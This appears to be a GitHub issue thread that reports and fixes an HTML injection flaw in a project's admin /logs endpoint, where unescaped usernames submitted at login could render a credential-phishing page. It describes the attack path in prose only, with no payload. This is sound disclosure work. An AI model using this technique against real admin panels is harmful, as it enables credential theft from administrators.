Security Vulnerability - Content Injection

[benmap-brex]

Impact:
Medium
(remotely explotiable with non-default configuration)

CVSS v 3.1 Vector:
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

The admin panel logs pages are vulnerable to HTML injection. An attacker can craft a phishing page using HTML + CSS and trick admins who view the page into disclosing their credentials. CSP prevents JS execution, but JS execution isn’t necessary to do damage.

[cviecco]

benmap-brex. I am unable to follow how this can happen on default configuration. (no logs exposed). Can you please elaborate?

[benmap-brex]

Hey, not sure what the default config is, but usernames are not HTML encoded when reflected into the /logs endpoint on port 6920. If an attacker POSTs to the login endpoint with a username containing HTML it will show up in the logs, as shown in the screenshot above.

[cviecco]

I agree with you... @rgooch : this is what happens when templates are not used. Since this happens only when public logs are enabled (non default) I am accepting this as bug, but making this a medium issue.

[cviecco]

I updated the impact and accepted this as bug

[benmap-brex]

Thanks for checking into this! Again, didn't know it wasn't a default config 👍

[rgooch]

Given this was exposed with a non-default configuration, is there anything we should/can do here?
@cviecco: I'm not sure what the relevance of templates vs. not using templates is. The /log endpoints dump the contents of the log files and the in-memory log buffer. I don't think the logs should be processed in any way by this endpoint.

[rgooch]

I've merged code (Cloud-Foundations/Dominator#49) which escapes HTML sequences in the logs display. Anyone building from HEAD will have this fix. I think that completes the source code side of this, so closing. Please re-open if you disagree.